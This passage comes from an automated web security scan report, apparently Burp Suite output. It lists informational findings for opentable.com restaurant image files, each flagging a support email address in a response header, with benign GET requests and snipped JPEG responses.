PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:47 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...

8.75. http://www.opentable.com/img/restimages/x4/27049.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/27049.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/27049.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1705
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:21:40 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-04
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:09 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...

8.76. http://www.opentable.com/img/restimages/x4/28498.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/28498.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/28498.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1552
Content-Type: image/jpeg
Last-Modified: Tue, 28 Jun 2011 16:24:02 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:07 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...

8.77. http://www.opentable.com/img/restimages/x4/29911.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/29911.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/29911.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1775
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:22:04 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:41 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...

8.78. http://www.opentable.com/img/restimages/x4/3261.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/3261.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/3261.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1648
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:22:26 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:09 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...

8.79. http://www.opentable.com/img/restimages/x4/32800.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/32800.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/32800.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1829
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:22:26 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-04
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:10 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...

8.80. http://www.opentable.com/img/restimages/x4/33988.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/33988.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/33988.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1837
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:22:36 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:08 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...

8.81. http://www.opentable.com/img/restimages/x4/34978.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/34978.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/34978.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1695
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:22:44 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:30 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...

8.82. http://www.opentable.com/img/restimages/x4/35518.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/35518.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/35518.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1621
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:22:50 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:39 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...

8.83. http://www.opentable.com/img/restimages/x4/3691.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/3691.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/3691.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1671
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:23:04 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:40 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...

8.84. http://www.opentable.com/img/restimages/x4/3847.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/3847.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/3847.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1676
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:23:20 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:44 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...

8.85. http://www.opentable.com/img/restimages/x4/40873.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/40873.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/40873.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1855
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:23:36 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:39 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...

8.86. http://www.opentable.com/img/restimages/x4/41065.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/41065.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/41065.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1724
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:23:36 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:07 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...

8.87. http://www.opentable.com/img/restimages/x4/4119.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/4119.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/4119.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1800
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:23:38 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:10 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...

8.88. http://www.opentable.com/img/restimages/x4/42679.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/42679.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/42679.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1499
Content-Type: image/jpeg
Last-Modified: Wed, 19 Jan 2011 19:42:53 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:39 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...

8.89. http://www.opentable.com/img/restimages/x4/46645.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/46645.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/46645.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1498
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:24:20 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:08 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...

8.90. http://www.opentable.com/img/restimages/x4/49015.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/49015.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/49015.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1523
Content-Type: image/jpeg
Last-Modified: Fri, 24 Sep 2010 23:24:34 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:45 GMT

......JFIF.....`.`.....C.
..    ..
   .    ..
.............$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C..........=)#)==================================================......8.4.."..............................
...[SNIP]...

8.91. http://www.opentable.com/img/restimages/x4/52144.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/52144.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/52144.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1723
Content-Type: image/jpeg
Last-Modified: Wed, 29 Sep 2010 15:20:35 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:49 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...

8.92. http://www.opentable.com/img/restimages/x4/52390.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/52390.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/52390.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1567
Content-Type: image/jpeg
Last-Modified: Wed, 24 Nov 2010 02:51:58 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:59:07 GMT

......JFIF.....`.`.....C.
.....
....

...........#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C.
........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......8.4.."..............................
...[SNIP]...

8.93. http://www.opentable.com/img/restimages/x4/57301.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /img/restimages/x4/57301.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET /img/restimages/x4/57301.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 1578
Content-Type: image/jpeg
Last-Modified: Mon, 14 Mar 2011 19:02:46 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
